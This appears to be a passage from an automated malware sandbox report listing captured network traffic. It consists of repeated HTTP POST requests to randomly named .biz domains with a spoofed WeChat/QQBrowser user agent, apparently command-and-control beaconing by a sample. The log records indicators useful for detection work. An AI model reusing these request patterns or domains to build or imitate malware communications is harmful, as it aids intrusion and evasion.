                            Source: global trafficHTTP traffic detected: POST /hbnyekwgryhvrr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /kxstjshewunex HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /yowtqsuuesmahbsb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /vipiwgiihx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /yclqyqmghucjea HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /wcffwbepjknhrkkd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /fsupyedkjsaginlp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /oknxycjjxcvmcyg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /kquvnwuqqcd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /ggwhl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /qcnhkliwpylu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /gvv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /vhprbmdefc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /rxkip HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /wqmolrbsijpjbu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /rgwkboikrm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /xp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /cx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /irsdmqckkulgp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /mgsjgpoacwottwhx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /yxnfodxhcdmnj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /lpr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /ryoeonf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /do HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /gblimgnlscyku HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /ukwrctauwj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /bct HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /lxrjyksdgpjxna HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /bdsoixvaivc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /oxda HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /docjrpuoliw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /jebhuwdu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /yavxloupuaxr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /vsxacwvtko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /kcrxavatov HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /iaiodpshpb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /ect HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /exqaqlffu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /ucjyqfgo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /pb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /ha HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /nqyrhhrsxbrr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /sonhfc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /hkdwng HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /yavfpoeu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /vjmakoegwejtsrok HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /rrlwj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /bteutovkpfgbea HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /ikwdwlrjrslefrvs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /xvwjoyasecofgd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /majxvi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /xtlulck HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /dnygdywcggkonbfe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /njgjrpxmf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /rd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /wi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /sqaajldpmyrnnl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /cgofyarxpklm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /cgtrhhgqi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /qtgyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /wcihxt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /ymrgibjtpgrltdn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /entqbvydd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /rhvd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /csepohryabqocrsd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
